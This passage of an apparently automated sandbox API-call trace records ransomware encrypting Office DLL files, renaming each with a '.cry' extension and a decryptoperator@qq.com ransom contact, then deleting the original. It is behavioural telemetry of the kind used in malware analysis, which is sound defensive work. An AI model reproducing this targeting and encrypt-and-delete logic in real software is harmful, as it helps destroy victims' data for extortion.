Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.046] lstrlenW (lpString=".dbf") returned 4 [0054.046] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.046] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.046] lstrlenW (lpString=".1cd") returned 4 [0054.046] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".jpg") returned 4 [0054.047] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".doc") returned 4 [0054.047] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString=".docx") returned 5 [0054.047] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1 [0054.047] lstrlenW (lpString=".pdf") returned 4 [0054.047] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString=".xls") returned 4 [0054.047] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString=".xlsx") returned 5 [0054.047] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1 [0054.047] lstrlenW (lpString=".ppt") returned 4 [0054.047] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".zip") returned 4 [0054.047] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString=".rar") returned 4 [0054.047] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.047] lstrlenW (lpString=".bz2") returned 4 [0054.047] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.047] lstrlenW (lpString=".7z") returned 3 [0054.047] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".dbf") returned 4 [0054.047] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".1cd") returned 4 [0054.047] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.047] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67 [0054.047] lstrlenW (lpString=".jpg") returned 4 [0054.047] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.048] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.048] lstrlenW (lpString="ACEODEXL.DLL") returned 12 [0054.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.093] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=15800) returned 1 [0054.093] CloseHandle (hObject=0x20c) returned 1 [0054.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 0x20 [0054.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.094] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.094] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0054.170] GetLastError () returned 0x0 [0054.170] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0054.224] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0054.225] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.225] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.225] SetEndOfFile (hFile=0x204) returned 1 [0054.225] CloseHandle (hObject=0x204) returned 1 [0054.226] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.226] SetEndOfFile (hFile=0x20c) returned 1 [0054.226] CloseHandle (hObject=0x20c) returned 1 [0054.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.227] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 1 [0054.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.228] lstrlenW (lpString=".doc") returned 4 [0054.228] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.228] lstrlenW (lpString=".docx") returned 5 [0054.228] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.228] lstrlenW (lpString=".pdf") returned 4 [0054.228] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.228] lstrlenW (lpString=".xls") returned 4 [0054.229] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".xlsx") returned 5 [0054.229] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.229] lstrlenW (lpString=".ppt") returned 4 [0054.229] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString=".zip") returned 4 [0054.229] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".rar") returned 4 [0054.229] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".bz2") returned 4 [0054.229] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.229] lstrlenW (lpString=".7z") returned 3 [0054.229] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString=".dbf") returned 4 [0054.229] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString=".1cd") returned 4 [0054.229] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString=".jpg") returned 4 [0054.229] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.229] lstrlenW (lpString=".doc") returned 4 [0054.229] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".docx") returned 5 [0054.229] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.229] lstrlenW (lpString=".pdf") returned 4 [0054.229] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".xls") returned 4 [0054.229] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.229] lstrlenW (lpString=".xlsx") returned 5 [0054.229] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.229] lstrlenW (lpString=".ppt") returned 4 [0054.230] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.230] lstrlenW (lpString=".zip") returned 4 [0054.230] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.230] lstrlenW (lpString=".rar") returned 4 [0054.230] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.230] lstrlenW (lpString=".bz2") returned 4 [0054.230] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.230] lstrlenW (lpString=".7z") returned 3 [0054.230] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.230] lstrlenW (lpString=".dbf") returned 4 [0054.230] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.230] lstrlenW (lpString=".1cd") returned 4 [0054.230] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0054.230] lstrlenW (lpString=".jpg") returned 4 [0054.230] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.230] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.230] lstrlenW (lpString="ACER3X.DLL") returned 10 [0054.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.231] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=451480) returned 1 [0054.231] CloseHandle (hObject=0x20c) returned 1 [0054.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 0x20 [0054.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.231] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.231] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0054.232] GetLastError () returned 0x0 [0054.232] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x6e398, lpOverlapped=0x0) returned 1 [0054.258] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x6e3a0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x6e3a0, lpOverlapped=0x0) returned 1 [0054.267] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.267] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.267] SetEndOfFile (hFile=0x204) returned 1 [0054.267] CloseHandle (hObject=0x204) returned 1 [0054.267] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.267] SetEndOfFile (hFile=0x20c) returned 1 [0054.270] CloseHandle (hObject=0x20c) returned 1 [0054.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.271] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 1 [0054.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.273] lstrlenW (lpString=".doc") returned 4 [0054.273] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.273] lstrlenW (lpString=".docx") returned 5 [0054.273] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0054.273] lstrlenW (lpString=".pdf") returned 4 [0054.273] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.273] lstrlenW (lpString=".xls") returned 4 [0054.273] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.273] lstrlenW (lpString=".xlsx") returned 5 [0054.273] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0054.273] lstrlenW (lpString=".ppt") returned 4 [0054.273] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.273] lstrlenW (lpString=".zip") returned 4 [0054.273] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".rar") returned 4 [0054.274] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".bz2") returned 4 [0054.274] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.274] lstrlenW (lpString=".7z") returned 3 [0054.274] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString=".dbf") returned 4 [0054.274] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString=".1cd") returned 4 [0054.274] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString=".jpg") returned 4 [0054.274] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString=".doc") returned 4 [0054.274] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".docx") returned 5 [0054.274] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0054.274] lstrlenW (lpString=".pdf") returned 4 [0054.274] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".xls") returned 4 [0054.274] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".xlsx") returned 5 [0054.274] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0054.274] lstrlenW (lpString=".ppt") returned 4 [0054.274] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.274] lstrlenW (lpString=".zip") returned 4 [0054.274] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".rar") returned 4 [0054.274] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.274] lstrlenW (lpString=".bz2") returned 4 [0054.274] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.274] lstrlenW (lpString=".7z") returned 3 [0054.274] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.275] lstrlenW (lpString=".dbf") returned 4 [0054.275] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.275] lstrlenW (lpString=".1cd") returned 4 [0054.276] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0054.276] lstrlenW (lpString=".jpg") returned 4 [0054.276] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.276] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.276] lstrlenW (lpString="ACETXT.DLL") returned 10 [0054.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.276] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=297360) returned 1 [0054.276] CloseHandle (hObject=0x20c) returned 1 [0054.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 0x20 [0054.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0054.277] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.277] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0054.277] GetLastError () returned 0x0 [0054.277] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x48990, lpOverlapped=0x0) returned 1 [0054.337] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x489a0, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x489a0, lpOverlapped=0x0) returned 1 [0054.342] ReadFile (in: hFile=0x20c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.342] WriteFile (in: hFile=0x204, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0054.342] SetEndOfFile (hFile=0x204) returned 1 [0054.342] CloseHandle (hObject=0x204) returned 1 [0054.343] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.343] SetEndOfFile (hFile=0x20c) returned 1 [0054.353] CloseHandle (hObject=0x20c) returned 1 [0054.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.354] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 1 [0054.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.354] lstrlenW (lpString=".doc") returned 4 [0054.354] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.354] lstrlenW (lpString=".docx") returned 5 [0054.355] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0054.355] lstrlenW (lpString=".pdf") returned 4 [0054.355] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString=".xls") returned 4 [0054.355] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString=".xlsx") returned 5 [0054.355] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0054.355] lstrlenW (lpString=".ppt") returned 4 [0054.355] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString=".zip") returned 4 [0054.355] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString=".rar") returned 4 [0054.355] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString=".bz2") returned 4 [0054.355] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.355] lstrlenW (lpString=".7z") returned 3 [0054.355] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString=".dbf") returned 4 [0054.355] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString=".1cd") returned 4 [0054.355] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString=".jpg") returned 4 [0054.355] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0054.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 